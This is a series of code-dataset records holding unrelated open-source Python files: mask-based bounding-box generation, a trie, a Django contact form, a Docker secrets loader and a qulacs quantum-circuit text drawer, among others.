else:\n raise Exception(\"data type must dvr or co3d\")\n \n masks = {}\n for mask_path in mask_paths:\n mask_name = mask_path.split(\"/\")[-1]\n if cam_file_type == \"txt\":\n if mask_name not in cam.keys():\n continue\n elif cam_file_type == \"npz\":\n if mask_name not in cam.keys():\n continue\n else:\n raise Exception(\"data type must dvr or co3d\")\n\n mask = np.array(Image.open(mask_path), 
dtype=np.float32)\n mask /= 255.0\n if len(mask.shape) == 3:\n # Does the alpha channel serve as the mask?\n if mask.shape[2] == 4:\n mask = mask[:, :, 3]\n else:\n mask = mask[:, :, 0]\n mask = (mask > args.mask_threshold)\n \n # Exclude black image\n y, x = np.where(mask)\n if len(x) != 0 and len(y) != 0:\n masks[mask_name] = mask\n\n # make 3d bbox\n try:\n xmax, ymax, zmax, xmin, ymin, zmin = make_bbox(masks, cam, args.extend_ratio, args.reliable_ratio, args.use_inf_bbox_to_bounded)\n except Exception:\n print(\"Some error in {mask_dir}\".format(mask_dir=args.mask_dir))\n return\n if xmax is None:\n # Infinity bounding box\n print(\"We can't make bbox for {mask_dir}\".format(mask_dir=args.mask_dir))\n return\n\n bbox_path = os.path.join(args.output_dir, \"bbox.txt\")\n with open(bbox_path, 'w') as f:\n f.write(\"{xmin} {ymin} {zmin}\\n\".format(xmin=xmin, ymin=ymin, zmin=zmin))\n f.write(\"{xmax} {ymax} {zmax}\".format(xmax=xmax, ymax=ymax, zmax=zmax))\n\n return\n\nif __name__ == \"__main__\":\n main()","repo_name":"snuvclab/chupa","sub_path":"src/normal_nds/make_bbox.py","file_name":"make_bbox.py","file_ext":"py","file_size_in_byte":47565,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"21"}
{"seq_id":"285320537","text":"import numpy as np\nimport math\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom mpmath import *\nimport os\nfiletorun = os.path.join(os.getcwd(), 'Set 2', 'confidence interval set2.py')\nexec(open(filetorun).read())\nfile1 = os.path.join(os.getcwd(), 'Set 2', 'ps2_posterior_05.txt')\nfile2 = os.path.join(os.getcwd(), 'Set 2', 'ps2_posterior_10.txt')\nfile3 = os.path.join(os.getcwd(), 'Set 2', 'ps2_posterior_20-1.txt')\nfile4 = os.path.join(os.getcwd(), 'Set 2', 'ps2_posterior_50.txt')\nfileArray = [file1,file2,file3,file4]\nprint(fileArray)\nconvertedFileArray = [None]*4\nfor f in range(len(fileArray)):\n convertedFileArray[f] = np.loadtxt(fileArray[f])\n actingArray = convertedFileArray[f]\n print(ConfidenceInterval(actingArray[0:,0],actingArray[0:,1], .68))\n print(ConfidenceInterval(actingArray[0:,0],actingArray[0:,1], .95))\n#print(convertedFileArray)\n","repo_name":"MarcosP7635/Ge-Ay117","sub_path":"Set 2/set2 problem3.py","file_name":"set2 problem3.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"3232296417","text":"from math import sqrt, inf\n\nimport numpy as np\n\n\ndef distance(x, y):\n return sqrt((x[0] - y[0])**2 + (x[1] - y[1])**2)\n\n\ndef get_incident_point(point, line):\n # ax + by + c -> -bx + ay + c' -> -bx + ay + bx1 - ay1\n perpendicular = [-line[1], line[0],\n (line[1]*point[0]) - (line[0]*point[1])]\n A = np.array([line[:2], perpendicular[:2]])\n B = np.array([line[-1:], perpendicular[-1:]])\n incident_point = np.matmul(np.linalg.inv(A), -1*B)\n return incident_point[0, 0], incident_point[1, 0]\n\n\ndef optimum_distance(points, line):\n min_sum_of_distances = inf\n for point in points:\n incident_point = get_incident_point(point, line)\n sum_of_distances = sum([distance(q, incident_point) for q in points])\n if sum_of_distances < min_sum_of_distances:\n min_sum_of_distances = sum_of_distances\n return min_sum_of_distances\n\n\npoints = [\n [-3, -2],\n [-1, 0],\n [-1, 2],\n [1, 2],\n [3, 4]\n]\n\nline = [1, -1, -3]\n\nprint(optimum_distance(points, line))\n","repo_name":"ritikrajdev/450DSA","sub_path":"Search & 
Sort/05_optimum_location.py","file_name":"05_optimum_location.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40764650355","text":"#!/usr/bin/env python\n# encoding: utf-8\n# @author: liusir\n# @file: demo_06.py\n# @time: 2020/11/29 11:44 上午\n\nstr1 = {\"errcode\":45157,\"errmsg\":\"invalid tag name hint: [ufofmzNre-xPogda] rid: 5fc31853-65c5781c-589a24b3\"}\ncheck_data = \"tag\"\n\ndef key_check(check_data):\n key_list = check_data.split(',')\n tmp_result = []\n for key in key_list:\n if key in str1.keys():\n tmp_result.append(True)\n else:\n tmp_result.append(False)\n if False in tmp_result:\n return False\n else:\n return True\n\nprint( key_check(check_data) )\n","repo_name":"qq329999897/P3P4_API_Test_Framework","sub_path":"samples/20201129/demo_06.py","file_name":"demo_06.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41631866012","text":"class Node:\n def __init__(self):\n self.children = {}\n self.isEndOfWord = False\n\nclass Trie:\n def __init__(self):\n self.root = Node()\n\n def insert(self, key):\n # If not present, inserts key into trie\n # If the key is prefix of trie node,\n # just marks leaf node\n\n curr = self.root\n\n for i in range(0, len(key)):\n if (key[i] not in curr.children):\n curr.children[key[i]] = Node()\n \n curr = curr.children[key[i]]\n \n curr.isEndOfWord = True\n \n def search(self, key):\n # Search key in the trie\n # Returns true if key presents\n # in trie, else false\n curr = self.root\n\n for i in range(0, len(key)):\n if (key[i] not in curr.children):\n return False\n \n curr = curr.children[key[i]]\n \n return curr.isEndOfWord\n \n def findEndingWords(self, node):\n amount = 0\n if (node.isEndOfWord):\n amount += 1\n \n for child in node.children:\n amount += self.findEndingWords(node.children[child])\n \n return amount\n \n def prefixSearch(self, key):\n curr = self.root\n count = 0\n for i in range(0, len(key)):\n if (key[i] not in curr.children):\n return 0\n \n curr = curr.children[key[i]]\n \n count += self.findEndingWords(curr)\n\n return count\n \n\n \n# driver function\ndef main():\n \n # Input keys (use only 'a' through 'z' and lower case)\n keys = [\"the\",\"a\",\"there\",\"anaswe\",\"any\",\n \"by\",\"their\"]\n output = [\"Not present in trie\",\n \"Present in trie\"]\n \n # Trie object\n t = Trie()\n \n # Construct trie\n for key in keys:\n t.insert(key)\n \n # Search for different keys\n print(\"{} ---- {}\".format(\"the\",output[t.search(\"the\")]))\n print(\"{} ---- {}\".format(\"these\",output[t.search(\"these\")]))\n print(\"{} ---- {}\".format(\"their\",output[t.search(\"their\")]))\n print(\"{} ---- {}\".format(\"thaw\",output[t.search(\"thaw\")]))\n\n keys = [\"hack\", \"hackerrank\"]\n t2 = Trie()\n\n for key in keys:\n t2.insert(key)\n \n lookup = [\"hac\", \"hak\", \"hack\", \"hacker\"]\n\n for key in lookup:\n print(t2.prefixSearch(key))\n\n\n \nif __name__ == '__main__':\n main()\n ","repo_name":"ericaltenburg/interviewPrep","sub_path":"code/ds/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9900300608","text":"\nclass Badboys:\n\tx=[]\n\ty=[]\n\tfor i in range(0,2):\n\t\tname=input('type the name..!')\n\t\tusn=input('your USN:')\n\t\tx.append(name)\n\t\ty.append(usn)\n\tfor j in 
range(0,2):\n\t\tprint('Name:',x[j])\n\t\tprint('USN:',y[j])\np=Badboys()\t\t\t\t\n\n","repo_name":"Thennavanmohan/18RoyalmechD12018","sub_path":"classfive.py","file_name":"classfive.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"5915479780","text":"from django.shortcuts import render, redirect\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.contrib import messages\nfrom .models import Contact\n\ndef contact(request):\n if request.method == 'POST':\n name = request.POST.get('name')\n phone = request.POST.get('phone')\n email = request.POST.get('email')\n message = request.POST.get('message')\n\n contact = Contact(name=name, phone=phone, email=email, message=message)\n contact.save()\n \n \n # send email\n subject = 'New message from your website'\n message = f'Name: {name}\\nPhone: {phone}\\nEmail: {email}\\nMessage: {message}'\n from_email = settings.DEFAULT_FROM_EMAIL\n recipient_list = [settings.DEFAULT_FROM_EMAIL]\n send_mail(subject, message, from_email, recipient_list, fail_silently=False)\n messages.success(request, 'Your message has been sent!')\n return redirect('contact')\n\n return render(request, 'contactapp/contact.html')\n\n# def contact(request):\n# return render(request,'contactapp/contact.html')","repo_name":"pinkal-sanoria/BojoTravelsProject","sub_path":"BojoTravels/contactapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"5550438712","text":"from pathlib import Path\n\n\nclass Secrets:\n def __init__(self, base_path: Path = Path('/run/secrets/')):\n self.base_path = base_path\n self._cache = {}\n\n def __getitem__(self, item) -> bytes:\n if not isinstance(item, str):\n raise TypeError(f'Invalid secret key type {type(item)}')\n\n if item not in self._cache:\n secret_file = self.base_path / item\n if not secret_file.exists():\n raise KeyError('Secret does not exist')\n\n with secret_file.open('rb') as f:\n self._cache[item] = f.read()\n\n return self._cache[item]\n\n\nsecrets = Secrets()\n","repo_name":"juananpe/forum40","sub_path":"backend/config/secrets.py","file_name":"secrets.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"70961627574","text":"# mypy: ignore-errors\nimport dataclasses\nimport shutil\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\nfrom qulacs import QuantumCircuit, QuantumGateBase\n\nfrom qulacsvis.models.circuit import ControlQubitInfo\nfrom qulacsvis.utils.gate import to_text_style\n\n\n@dataclasses.dataclass\nclass DotStyle:\n ctrl: str\n ctrlo: str\n\n\nCON_DOT_STYLE: Dict[str, DotStyle] = {\n \"large\": DotStyle(ctrl=\"●\", ctrlo=\"○\"),\n \"small\": DotStyle(ctrl=\"・\", ctrlo=\"⚬\"),\n}\n\n\ndef _set_con_dot(dot: str) -> DotStyle:\n \"\"\"\n Set a character to mean control qubit.\n\n Parameters\n ----------\n dot: str\n dot style \"large\" or \"small\"\n\n Returns\n -------\n DotStyle\n dot characters\n \"\"\"\n if dot in CON_DOT_STYLE:\n return CON_DOT_STYLE[dot]\n else:\n return CON_DOT_STYLE[\"large\"]\n\n\nclass _Gate_AA_Generator:\n \"\"\"Class for drawing qulacs quantum gates (QuantumGateBase) as text art.\"\"\"\n\n def __init__(self, *, dot: str = \"large\") -> None:\n # The gate shape is built by creating row strings from the top of the gate downward and appending them to gate_string\n self.gate_string: List[str] = []\n\n # Symbol used for control qubits\n 
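        # e.g. _set_con_dot("large") returns DotStyle(ctrl="●", ctrlo="○");
        # an unknown style string falls back to the "large" pair.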
self.CON_DOT = _set_con_dot(dot)\n\n def generate(\n self, gate: QuantumGateBase, index: str = \" \", verbose: bool = False\n ) -> List[str]:\n \"\"\"引数のゲートを文字列表示で返してくれる関数\n Argeuments:\n gate: Qulacsのゲート(QuantumGateBase)\n index: circuitに追加された順番を示す値, 1000以上の場合は表示が崩れる\n verbose: Trueだと詳細出力, 表示されるゲートにcircuitで追加された順番(引数のindex)を表示\n Return:\n gate_string: 1次元のリスト(リストのリスト)\n 1次元目が行の指定, 2次元目が文字の指定\n\n ゲートの表示法とパーツの説明(CNOTを例に)\n ・大きさは縦8×横7\n 0123456 パーツ名 説明\n 0 <= control_q_head : 制御qubitのときの空白文字\n 1 <= control_q_name : 上に同じ\n 2 ---・--- <= control(_o)_q_body : このqubitが制御qubitであることを示す\"・,⚬\"\n 3 | <= vertical_wire : 制御qubitと接続する縦向きのワイヤー\n 4 _|_ <= gate_head : ゲートの天井\n 5 |CX | <= gate_name : どのゲートかを表示するゲートの名前と左右の壁\n 6 -| |- <= gate_body_with_wire : ゲートの左右の壁, ワイヤーのないものはgate_body\n 7 |___| <= gate_botom : ゲートの下底\n\n \"\"\"\n # ゲートの文字列表現を初期化\n self.gate_string.clear()\n\n # verboseに応じて回路への追加番号を表示させるかさせないか文字列を作成\n if verbose:\n index = str(index).zfill(3)\n else:\n index = \" \"\n\n # 実際にゲートが適用されるターゲットqubitのリストと, コントロール用の制御qubitのリストを取得\n t_list = gate.get_target_index_list()\n c_list = gate.get_control_index_list()\n cv_list = [\n ControlQubitInfo(index, control_value)\n for index, control_value in gate.get_control_index_value_list()\n ]\n # ゲート作成時の引数の順番や, add_control_qubitメソッドなどで\n # 制御qubitを追加したときなどでリストが昇順になっていないことがあるのでソートしておく\n t_list.sort()\n c_list.sort()\n cv_list.sort(key=lambda x: x.index)\n\n # 制御qubitが実ゲート(ターゲットqubitにかかるゲート)より上に存在するかチェック\n if len(c_list) != 0 and min(t_list) > min(c_list):\n # 制御qubitが実ゲートより上に存在した\n upper = True\n # ターゲットqubitにかかるゲートより上側に存在する制御qubitの部分の文字列表現を作成\n self.gen_upper_control_part(t_list, cv_list)\n else:\n # 制御qubitが実ゲートより上に存在しない\n upper = False\n\n # ターゲットqubitにかかる部分のゲートの文字列表現を作成\n self.gen_target_part(gate, t_list, index, upper)\n\n # 制御qubitが実ゲートの間に存在するときの制御qubitを描画\n self.gen_inner_control_part(t_list, cv_list)\n\n # 制御qubitが実ゲート(ターゲットqubitにかかるゲート)より下に存在するかチェック\n if len(c_list) != 0 and max(t_list) < max(c_list):\n # ターゲットqubitにかかるゲートより上側に存在する制御qubitの部分の文字列表現を作成\n self.gen_lower_control_part(t_list, cv_list)\n\n return self.gate_string\n\n def gen_upper_control_part(\n self, t_list: List[int], cv_list: List[ControlQubitInfo]\n ) -> None:\n \"\"\"ターゲットqubitにかかるゲートより上側に存在する制御qubitを描くメソッド\"\"\"\n # 以下制御qubit用のパーツ作り\n # 制御qubit用の部分の形(空)\n control_q_head = \" \"\n # 制御qubit用の部分の形(空)\n control_q_name = \" \"\n # 制御qubit用の部分の接続の部分の形\n control_q_body = \" {} \".format(self.CON_DOT.ctrl)\n control_o_q_body = \" {} \".format(self.CON_DOT.ctrlo)\n # 制御信号用のワイヤーの形\n vertical_wire = \" | \"\n\n # ターゲットqubitにかかるゲートよりも上側に存在している制御qubitのリスト\n upper_c_list: List[ControlQubitInfo] = [\n i for i in cv_list if i.index < min(t_list)\n ]\n\n # 制御qubitの回路図を構成していく\n self.gate_string.append(control_q_head)\n self.gate_string.append(control_q_name)\n if upper_c_list[0].control_value == 0:\n self.gate_string.append(control_o_q_body)\n else:\n self.gate_string.append(control_q_body)\n # 制御qubitと実ゲートのqubitでもっとも離れているqubit(実ゲートのqubitは一番上のqubit)を選び\n # 距離を計算. 
このqubitから下へと縦のワイヤーを引く\n diff = min(t_list) - min(upper_c_list, key=lambda x: x.index).index\n for _ in range(diff * 4 - 3):\n self.gate_string.append(vertical_wire)\n\n # 制御信号をどのワイヤーからとっているか表す\"・\"を描き込む\n # 最初の制御qubitは描き込み済みなので2つ目以降の制御qubitから\n for i in upper_c_list[1:]:\n # 制御qubitと実ゲートのかかるqubitで最も近いものとがいくつ離れているか計算\n diff = min(t_list) - i.index\n # 仕様に合わせて位置を調整\n p = diff * 4 - 2\n # 配列に\"・\"を描き込み(上書き)\n if i.control_value == 0:\n self.gate_string[-p] = control_o_q_body\n else:\n self.gate_string[-p] = control_q_body\n\n def gen_target_part(\n self, gate: QuantumGateBase, t_list: List[int], index: str, upper: bool\n ) -> None:\n \"\"\"ターゲットqubitにかかる部分のゲートの文字列表現を描くメソッド\"\"\"\n # ターゲットqubitにかかる部分のゲートの大きさを取得\n # ゲートのかかるqubit同士が離れている場合はその間のqubitも使用すると考えて回路図を描くので,\n # 正確にはゲートのかかるqubitのうち一番上のqubitから一番下のqubitまでの大きさ\n gate_size = max(t_list) - min(t_list) + 1\n\n # ゲートの上部分の形\n # もしコントロールqubitが実ゲートよりも上にあるとき, つまり上から制御用のワイヤーが入るとき\n # ゲートの上の形は制御の線を接続した形になる\n if upper:\n gate_head = \" _|_ \"\n else:\n gate_head = \" ___ \"\n # ゲートの名前が表示される部分の形\n try:\n # ゲートの横幅を3文字分でゲート名を作成\n gate_name = \" |{}| \".format(to_text_style(gate.get_name()))\n except KeyError:\n # もし新たに追加されたゲートなどで見つからなかったときは\"UnDeFined\"\n gate_name = \" |UDF| \"\n # ワイヤー付き, またはついていない部分のゲートの形\n # パラメータ付き回路やDenseMatrixの場合はこの部分にパラメータを入れて表示させたい\n gate_body_with_wire = \"-| |-\"\n gate_body = \" | | \"\n # ゲートの下部分の形\n gate_bottom = \" |___| \"\n\n # 作成を始める\n if gate_name == \" |SWP| \":\n # SWAPの時だけ別に描く, どこがスワップするのか少し見にくかったので. 下のelse以下の表示法でも可.\n self.create_SWAP_gate_string(gate_size, t_list, index)\n else:\n # SWAP以外の全てのゲートは以下\n self.gate_string.append(gate_head) # ゲートの一番頭部分\n self.gate_string.append(gate_name) # ゲートの種類表示の部分\n self.gate_string.append(\"-|{}|-\".format(index)) # ゲートの追加番号or空白の部分\n for i in range(1, gate_size * 4 - 3): # 左右の壁の部分を描くループ\n # ((i+2)//4)+(描き始めのqubitのインデックス)は現在いるqubitのインデックス描いているqubitのインデックス\n q_index = (i + 2) // 4 + min(t_list)\n if q_index in t_list:\n # 現在描いている壁がターゲットqubitのリストの中にあるとき,\n # つまり, 今描いている壁の部分は実際にゲートが適用されるqubitであるとき\n # i%4の値でゲートのどの部分を描いているかが分かる(1つのゲートの高さが4なため)\n if i % 4 == 0:\n # 余りが0のときは横向きのワイヤーが接続する部分なのでwith_wireを繋ぐ\n self.gate_string.append(gate_body_with_wire)\n elif i % 4 == 1:\n # 余りが1のときはゲートの底部分, または離れたqubitにかかるゲートを描いているときの\n # 横幅が狭い(1文字分)の壁の部分. どちらかによって描き方が変わる.\n if q_index + 1 in t_list:\n # 今描いているqubitのインデックス+1のqubitもゲートがかかるとき,\n # つまり, 次のqubitもゲートがかかるとき\n self.gate_string.append(gate_body) # 3文字分のゲート幅の壁を追加\n else:\n # 今描いているqubitのインデックス+1のqubitにはゲートがかからないとき,\n # つまり, 今描いているのqubitの隣のqubitにはゲートがかからず,\n # 離れたqubitにゲートがかかるとき(ゲートのかかるqubitが隣接していないとき)\n self.gate_string.append(\n \" |_ _| \"\n ) # 次のqubitにはかからないことを示すため狭める\n elif i % 4 == 2:\n # 余りが2のときはゲートの頭部分, または連続したqubitにかかる多qubitゲートを\n # 描いているときの3文字分のゲートの壁の部分. 
どちらかによって描き方が変わる.\n if q_index - 1 in t_list:\n # 今描いているqubitの1つ前のqubitにもゲートがかかっていたとき,\n # つまり, 前のqubitのゲートと連続して今描いているqubitにもゲートがかかるとき\n self.gate_string.append(gate_body) # 3文字分のゲート幅の壁を追加\n else:\n # 今描いているqubitの1つ前のqubitにはゲートがかかっていなかったとき,\n # つまり, 前のqubitはゲートのかからないqubitで今描いているqubitが実は\n # 離れた位置に存在したゲートのかかるqubitのとき\n self.gate_string.append(\n \" _| |_ \"\n ) # このqubitからゲートがかかることを示すため広げる\n else:\n # 余りが3のときはgate_nameにあたる部分だが, 多qubitゲートの場合は描くものがない\n self.gate_string.append(gate_body) # 3文字分のゲートの壁を追加\n\n else:\n # 現在描いている壁がターゲットqubitのリストの中にないとき,\n # つまり, 今描いている壁の部分は実際にゲートが適用されないqubitで\n # もっと下の(離れた位置にある)qubitにかかるゲートを描くための間の部分のqubitのときである.\n # このときは, 今のqubitにはかかっていないことを見やすくするためにゲートの幅を1文字分に変更したものを表示する\n if i % 4 == 0:\n # この位置は横向きのワイヤーを描く部分\n self.gate_string.append(\"--| |--\")\n else:\n # ゲート幅が1文字分になるようのゲートの左右の壁を描く\n self.gate_string.append(\" | | \")\n self.gate_string.append(gate_bottom) # ゲートの最も底部分\n\n def create_SWAP_gate_string(\n self, gate_size: int, t_list: List[int], index: str\n ) -> None:\n \"\"\"SWAPゲートをきれいに描くためのメソッド\"\"\"\n # ゲートの上部分の形, SWAPは空\n gate_head = \" \"\n # ゲートの名前が表示される部分の形, verbose=Trueのときは追加された順番でそれ以外は空\n gate_name = \" {} \".format(index)\n # SWAPする位置を表す部分. この部分が他のゲートの場合と異なり, \"×\"が着くのは\n # SWAPする2点のqubitのみでその間のqubitのワイヤーは接続の縦線ワイヤーで描きたい\n swap_body_with_wire = \"---x---\"\n gate_body_with_wire = \"---|---\"\n # 右壁と左壁の部分, SWAPの場合はSWAPするqubit同士を繋ぐ縦線のワイヤー\n gate_body = \" | \"\n # ゲートの下部分の形, SWAPは空\n gate_bottom = \" \"\n\n # 作成し始める\n self.gate_string.append(gate_head) # 頭部分\n self.gate_string.append(gate_name) # ゲートの種類表示の部分\n self.gate_string.append(swap_body_with_wire) # SWAPする1つ目のqubitの\"×\"部分\n for i in range(1, gate_size * 4 - 4): # 左右の壁の部分\n if i % 4 == 0:\n self.gate_string.append(gate_body_with_wire)\n else:\n self.gate_string.append(gate_body)\n self.gate_string.append(swap_body_with_wire) # SWAPする2つ目のqubitの\"×\"部分\n self.gate_string.append(gate_bottom) # 底部分\n\n def gen_inner_control_part(\n self, t_list: List[int], cv_list: List[ControlQubitInfo]\n ) -> None:\n \"\"\"実ゲートが離れたqubitにかかる場合で, 制御qubitがその間にあるときに描くメソッド\"\"\"\n # 実ゲートの間に存在している制御qubitのリストを作成\n inner_c_list = [\n i for i in cv_list if i.index > min(t_list) and i.index < max(t_list)\n ]\n\n # 上で作成したリストを基に, 既に作成済みである実ゲートを上書きする(空リストの時はなにもしない)\n for i in inner_c_list:\n # (取得した制御qubitのインデックス)-(実ゲートの一番上のqubit)で描き始めのqubitから\n # 何個下のqubitに描き込めばよいか分かる. この値をゲートの高さ分修正(*4-2)して中央をドットに書き換える\n row = (i.index + 1 - min(t_list)) * 4 - 2\n if i.control_value == 0:\n control_dot_str = self.CON_DOT.ctrlo\n else:\n control_dot_str = self.CON_DOT.ctrl\n\n self.gate_string[row] = (\n self.gate_string[row][:3] + control_dot_str + self.gate_string[row][4:]\n )\n\n def gen_lower_control_part(\n self, t_list: List[int], cv_list: List[ControlQubitInfo]\n ) -> None:\n \"\"\"ターゲットqubitにかかるゲートより下側に存在する制御qubitを描くメソッド\"\"\"\n # 以下制御qubit用のパーツ作り\n # 制御qubit用の部分の接続の部分の形\n control_q_body = \" {} \".format(self.CON_DOT.ctrl)\n control_o_q_body = \" {} \".format(self.CON_DOT.ctrlo)\n # 制御信号用のワイヤーの形\n vertical_wire = \" | \"\n\n # ターゲットqubitにかかるゲートよりの下側に存在している制御qubitのリスト\n below_c_list: List[ControlQubitInfo] = [\n i for i in cv_list if i.index > max(t_list)\n ]\n\n # 制御qubitと実ゲートのqubitでもっとも離れているqubit(実ゲートのqubitは一番下のqubit)を選び\n # 距離を計算. 
このqubitから下へと縦向きのワイヤーを引く\n diff = max(below_c_list, key=lambda x: x.index).index - max(t_list)\n loop = diff * 4 - 1\n for _ in range(loop):\n self.gate_string.append(vertical_wire)\n\n # 制御信号をどのワイヤーからとっているか表す\"・\"を描き込む\n for i in below_c_list:\n # 制御qubitとゲートとの距離を計算\n diff = i.index - max(t_list)\n # 仕様に合わせて位置を調整\n p = diff * 4 - loop - 2\n # 配列に\"・\"を描き込み(上書き)\n if i.control_value == 0:\n self.gate_string[p] = control_o_q_body\n else:\n self.gate_string[p] = control_q_body\n\n\nclass TextCircuitDrawer:\n \"\"\"qulacsの量子回路(QuantumCircuit)を描画するためのクラス\"\"\"\n\n def __init__(self, circuit: QuantumCircuit, *, dot: str = \"large\") -> None:\n # 制御qubitの記号\n self.CON_DOT = _set_con_dot(dot)\n # 出力したい量子回路\n self.circ = circuit\n # 出力したい量子回路の深さ\n self.depth = circuit.calculate_depth()\n # 出力したい量子回路のqubit数\n self.qubit_num = circuit.get_qubit_count()\n\n # 量子回路図をできるだけ左詰め(回路が浅くなるよう)に配置するための参照する配列\n # 2次元配列であり要素数は(qubit数)*(回路の深さ) <= 場合により深くなっていく\n # 各qubitのそれぞれの深さにおいてゲートをセットできる場合はTrueを, できない場合はFalseを表示する\n # 例) gate_map = [[False, False, True], ← 1qubit目\n # [False, True, True], ← 2qubit目\n # [True, True, True]] ← 3qubit目\n # ↑ ↑ ↑\n # 深さ1 深さ2 深さ3\n # 上のgate_mapは\n # ・1qubit目は深さ1と深さ2ですでにゲートが存在している, 次にゲートを適用できるのは深さ3の場所\n # ・2qubit目は深さ1の場所にすでにゲートが存在している, 次にゲートを適用できるのは深さ2の場所\n # ・3qubit目はまだゲートが存在していない, 次にゲートを適用できるのは深さ1の場所\n # を表す\n self.gate_map = np.full((self.qubit_num, self.depth), True)\n\n # 量子回路の文字列表示を保持させる変数(2次元配列)\n # 要素に文字1文字を割り当て、回路図として表現する方針\n # 大きさは縦が(qubit数×4). 4は1つのゲートの縦幅.\n # 横が(深さ×7)+(深さ-1)+2. 7は1つのゲートの横幅. (深さ-1)は各深さに存在するゲート同士を\n # \"-\"で繋ぐため,その数. +2は回路の左端と右端を\"-\"1文字で描画するため.\n # 以下イメージ\n # 深さが1と2のゲートの\n # 左端 間のワイヤーの位置 右端\n # ↓ ↓ ↓\n # 0 1 2 3 4 5 6 7 8 9 A B C D E F 10 (<=16進数表示) ←横サイズ\n # 0 _ _ _\n # 1 | X |\n # 2 - - | | - - - - - ・ - - - -\n # 3 | _ _ _ | |\n # 4 _ | _\n # 5 | D e M |\n # 6 - - - - - - - - - - | | - -\n # 7 | _ _ _ |\n # ↑縦サイズ <=====> ゲートの幅は3文字分, これに前後の壁である\"-|\", \"|-\"を\n # 合わせると1つのゲートの幅は7文字分.\n\n self.vertical_size = self.qubit_num * 4 # 縦サイズ\n self.horizontal_size = self.depth * 7 + self.depth - 1 + 2 # 横サイズ\n self.circuit_picture = np.full(\n (self.vertical_size, self.horizontal_size), \" \"\n ) # 配列作成,空白1文字で初期化\n # 量子回路の左端と右端のワイヤーを\"-\"で描いておく\n for i in range(self.qubit_num):\n # 横向きのワイヤーがある場所は配列番号で2,6,10,14,...番目\n row = (i + 1) * 4 - 2\n self.circuit_picture[row][0] = \"-\"\n self.circuit_picture[row][-1] = \"-\"\n\n # 単体のゲートの文字列表現を作成するクラスを呼び出す\n self.AA_Generator = _Gate_AA_Generator(dot=dot)\n\n def draw(self, verbose: bool) -> None:\n \"\"\"実際に回路を描き始め出力までするメソッド\"\"\"\n # 出力したい量子回路の持つゲート数を取得\n gate_num = self.circ.get_gate_count()\n # ゲートを1つずつ取り出し回路図に描き込んでいく\n for i in range(gate_num):\n gate = self.circ.get_gate(i)\n # 確率的に作用するゲートなどでtarget_qubitのインデックスが無いものはスキップする\n if len(gate.get_target_index_list()) == 0:\n print(\n f\"CAUTION: The {i}-th Gate you added is skipped.\"\n + 'This gate does not have \"target_qubit_list\"'\n )\n else:\n self._draw_gate(gate, index=i, verbose=verbose)\n\n # ゲートを描き終えたら, ゲート同士や接続が切れているワイヤーを繋ぐ\n self._connect_wire()\n\n # 描き込まれたゲートを実際に出力する\n # ただし、回路の長さに応じて表示方法を変える\n terminal_size = shutil.get_terminal_size().columns - 1 # プロンプトの1行に表示できる文字数-1\n # プロンプトに収まる場合は普通に表示\n if self.horizontal_size <= terminal_size:\n for line in self.circuit_picture:\n print(\"\".join(line))\n # 回路が長いときは途中で折り返して表示する\n else:\n # 折り返して表示するときの、表示を繰り返す回数\n col = self.horizontal_size // terminal_size\n # 折り返して表示する際の区切り文字。\"#\"で区切る\n delimiter = \"\\n\" + \"#\" * terminal_size\n # 回路図のどこまでを表示したか思えておく変数\n plot_range = 0\n # プロンプトの横幅までの表示を繰り返す\n 
print(delimiter)\n for i in range(col):\n # 今何回目の表示かを出力\n print(\">>\", i)\n # 回路図の出力\n for line in self.circuit_picture:\n print(\"\".join(line[plot_range : plot_range + terminal_size]))\n # 表示済みの回路図を記憶\n plot_range += terminal_size\n # 区切りの出力\n print(delimiter)\n # 回路の最後の部分の表示\n print(\">>\", col)\n for line in self.circuit_picture:\n print(\"\".join(line[plot_range:]))\n print(delimiter)\n\n def _draw_gate(self, gate: QuantumGateBase, index: str, verbose: bool) -> None:\n \"\"\"引数にgateをとり, 「ゲートの文字化」, 「適切な位置に描き込み」 の順で実際に描き込むメソッド\"\"\"\n # 単一のゲートの文字列表示を作成\n gate_string = self.AA_Generator.generate(gate, index, verbose)\n\n # 実際にゲートが適用されるターゲットqubitと, コントロール用の制御qubitのリストを取得\n target_qubit_list = gate.get_target_index_list()\n control_qubit_list = gate.get_control_index_list()\n # 続いて, 制御qubitとターゲットqubitの両方を合わせた, 実際にゲートがかかるqubitのリストを取得.\n tc_list = target_qubit_list + control_qubit_list\n # これは例えばCNOT(0,2), X(1)のような回路を描こうとしたとき, 回路の深さは1だがそのまま深さ1で描こうとすると\n # ゲートの追加順に応じて CNOTの制御用ワイヤー上にXゲートが乗ってしまう or Xゲートで縦向きの制御信号の上書き\n # が起こってしまった. よって, 本プログラムでは回路の深さを増やして表示が重ならないようにして対応しようと考えた.\n # 方針として制御qubitとターゲットqubitが離れている場合を想定し, 間にまたがるqubit全てを確保することで実装する.\n\n # circuit_pictureに描き込むに必要な左上隅のインデックスを取得\n # 引数は使用するqubitのリストの最小値と最大値\n upper_left_corner = self._place_check(min(tc_list), max(tc_list))\n # 作成した文字列表示をircuit_pictureに描き込む\n self._write_gate_on_picture(gate_string, upper_left_corner)\n\n def _place_check(self, min_v: int, max_v: int) -> Tuple[int, int]:\n \"\"\"適切なゲートの描き込み位置を計算するメソッド\"\"\"\n # 回路の浅い所から探索\n for i in range(self.depth):\n # 